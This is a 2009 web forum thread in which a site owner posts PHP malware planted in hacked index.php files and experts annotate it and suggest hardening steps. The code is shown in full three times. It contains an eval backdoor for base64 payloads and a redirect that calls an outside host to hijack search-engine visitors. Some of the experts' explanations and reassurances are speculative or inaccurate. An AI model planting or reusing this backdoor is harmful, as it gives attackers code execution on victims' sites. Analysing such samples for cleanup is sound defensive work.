Solved

Boards not loading properly after attack

Posted on 2009-05-15
4
902 Views
Last Modified: 2013-11-11
Today my site suffered an attack (again) and  several index.php pages were deleted and changed with their own files from the hackers. Now i have reversed the damages, but my boards are not loading properly. what can be going wrong? the rest of the site is running smoothly, this is the code they hackers have set in the -now deleted- indes files
<?php $a=@$_POST['a'];if($a && @$_POST['b']==sha1(md5($a))){$a=base64_decode($a);eval($a);} function get_counter(){$ip=$_SERVER['REMOTE_ADDR'];$uniq=@file_get_contents("http://uniqtds2.com/ip.php?ip=$ip");if($uniq===false){return false;}if($uniq=="go"){return true;}return  false;}$ref=strtolower(trim(@$_SERVER['HTTP_REFERER']));if((strpos($ref,"google")!==false)and(strpos($ref,"bot.htm")===false)){if(get_counter()){@header("Location: http://uniqtds2.com/tds_u.php?dname=".$_SERVER['HTTP_HOST']);die();}}if((strpos($ref,"yahoo")!==false)and(strpos($ref,"slurp")===false)){if(get_counter()){@header("Location: http://uniqtds2.com/tds_u.php?dname=".$_SERVER['HTTP_HOST']);die();}} ?>

Open in new window

0
Comment
Question by:axtur
  • 2
4 Comments
 
LVL 34

Expert Comment

by:Beverley Portlock
ID: 24399440
It seems to be counting traffic. I have not gone into it in detail, but that is what it seems to be doing. I have attached a reformatted version so you can study it in detail

If the site is not running properly then check for .htaccess files and see what they contain. Your FTP client may need a setting to "Show hidden files"
<?php
 
$a = @ $_POST['a'];
if ($a && @ $_POST['b'] == sha1(md5($a))) {
	$a = base64_decode($a);
	eval ($a);
}
function get_counter() {
	$ip = $_SERVER['REMOTE_ADDR'];
	$uniq = @ file_get_contents("http://uniqtds2.com/ip.php?ip=$ip");
	if ($uniq === false) {
		return false;
	}
	if ($uniq == "go") {
		return true;
	}
	return false;
}
$ref = strtolower(trim(@ $_SERVER['HTTP_REFERER']));
if ((strpos($ref, "google") !== false) and (strpos($ref, "bot.htm") === false)) {
	if (get_counter()) {
		@ header("Location: http://uniqtds2.com/tds_u.php?dname=" . $_SERVER['HTTP_HOST']);
		die();
	}
}
if ((strpos($ref, "yahoo") !== false) and (strpos($ref, "slurp") === false)) {
	if (get_counter()) {
		@ header("Location: http://uniqtds2.com/tds_u.php?dname=" . $_SERVER['HTTP_HOST']);
		die();
	}
}
?>

Open in new window

0
 
LVL 3

Accepted Solution

by:
markh789 earned 500 total points
ID: 24400929
The script, is used as a ddos spot.
Let me explain what there doing, they have bots set to the page, to open it, using a botnet. Not only will the cause to much traffic though it will open http://uniqtds2.com/tds_u.php?dname=*var*, this php script could be doing.. anything, they also have a php Eval(); set up so they can run there own PHP commands, the bots may still be trying to access files. Check your apache logs and see what files there accessing, if its from a random file then use htacces to block that file (look in error.log, something like that).

You should try disabling the function file_get_contents for a few weeks and see if any changes happen.

They could also be trying to make profit off adverts' by redirecting all your users to a porn website, I've seen this done before - and they will register, enter cc details, etc, spam happens money loss, you go it they will do it. Although, since there bots are opening the advert around 10 times / second they get 10 cents a click.. there using your website as a money-maker!

I can recommend is to try and block uniqtds2.com with something like OpenDNS.

Disable the following functions for security:
apache_child_terminate,apache_setenv,define_syslog_variables,show_source,ini_set,passthru,system,popen,ini_read,escapeshellarg,proc_close,proc_open,exec,shell_exec,system_exec,ini_alter,ini_get_all,ini_restore,parse_ini_file,escapeshellcmd

In your php.ini, if your on a host, request for them to do it for you.

Disabling them functions will help block shells, if you want you can also turn display_errors to false in your php.ini.

Right now, you should be checking EVERY file even .txt files to see if any of the code is there, try upload upgrade files on your board to see if that fixes it.

I've added a few comments to the PHP code, take a look.

If it's only like - 20 bots try blocking all the bots I.P's in .htaccess.
Order Allow, Deny
Allow from *
Deny from bot1
Deny from bot2
Deny from bot3
Deny from bot4
Deny from bot5

(that may be incorrect)
<?php
 
$a = @ $_POST['a'];
if ($a && @ $_POST['b'] == sha1(md5($a))) {
        // Decode base64 code
        $a = base64_decode($a);
        // Run the case64 code
        eval ($a);
}
function get_counter() {
        $ip = $_SERVER['REMOTE_ADDR'];
        // This could be where the ddos is coming from.
        $uniq = @ file_get_contents("http://uniqtds2.com/ip.php?ip=$ip");
        if ($uniq === false) {
                return false;
        }
        if ($uniq == "go") {
                return true;
        }
        return false;
}
// Grabs referral, it also checks for bot.htm in the referral 
$ref = strtolower(trim(@ $_SERVER['HTTP_REFERER']));
if ((strpos($ref, "google") !== false) and (strpos($ref, "bot.htm") === false)) {
        if (get_counter()) {
                // Redirects to a porn website.
                @ header("Location: http://uniqtds2.com/tds_u.php?dname=" . $_SERVER['HTTP_HOST']);
                die();
        }
}
// Checks to see if "yahoo" or "slurp" is in the referral 
if ((strpos($ref, "yahoo") !== false) and (strpos($ref, "slurp") === false)) {
        if (get_counter()) {
                // Redirects to a porn website.
                @ header("Location: http://uniqtds2.com/tds_u.php?dname=" . $_SERVER['HTTP_HOST']);
                die();
        }
}
?>

Open in new window

0
 

Author Comment

by:axtur
ID: 24406123
I have checked the code and I don't see anything strange on it, the only changed file (index.php) has been reverse, no other files have been found.

what can i do? How can i see the hidden files?
0
 
LVL 3

Expert Comment

by:markh789
ID: 24409564
file_get_contents could be used a ddos point, to download.
You can easily set bots to that page to tell the server to download the file as many times as it wants.

If you can run shell files you can run the shell line command:
    ls -a /PATH/HERE

Replace /PATH/HERE with you public_html dir, and you can check it for files, etc.

Did you disable the functions:

apache_child_terminate,apache_setenv,define_syslog_variables,show_source,ini_set,passthru,system,popen,ini_read,escapeshellarg,proc_close,proc_open,exec,shell_exec,system_exec,ini_alter,ini_get_all,ini_restore,parse_ini_file,escapeshellcmd

If you did your fine from further attacks.

If you want ddos protection on your serve then look at what i found here:

Run this in shell:
cd /usr/src
wget http://www.zdziarski.com/projects/mod_evasive/mod_evasive_1.10.1.tar.gz
tar xfz mod_evasive_1.10.1.tar.gz
cd mod_evasive
type apxs

THEN edit your httpd.conf file and add:
<IfModule mod_evasive20.c>
DOSHashTableSize 3097
DOSPageCount 2
DOSSiteCount 50
DOSPageInterval 1
DOSSiteInterval 1
DOSBlockingPeriod 300
</IfModule>

Change your values if needed,

If you have root that is.

If not ask your host for some better ddos protection.
0

Featured Post

Windows Server 2016: All you need to know

Learn about Hyper-V features that increase functionality and usability of Microsoft Windows Server 2016. Also, throughout this eBook, you’ll find some basic PowerShell examples that will help you leverage the scripts in your environments!

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

This article discusses how to create an extensible mechanism for linked drop downs.
Since pre-biblical times, humans have sought ways to keep secrets, and share the secrets selectively.  This article explores the ways PHP can be used to hide and encrypt information.
The viewer will learn how to look for a specific file type in a local or remote server directory using PHP.
The viewer will learn how to create a basic form using some HTML5 and PHP for later processing. Set up your basic HTML file. Open your form tag and set the method and action attributes.: (CODE) Set up your first few inputs one for the name and …

813 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question

Need Help in Real-Time?

Connect with top rated Experts

10 Experts available now in Live!

Get 1:1 Help Now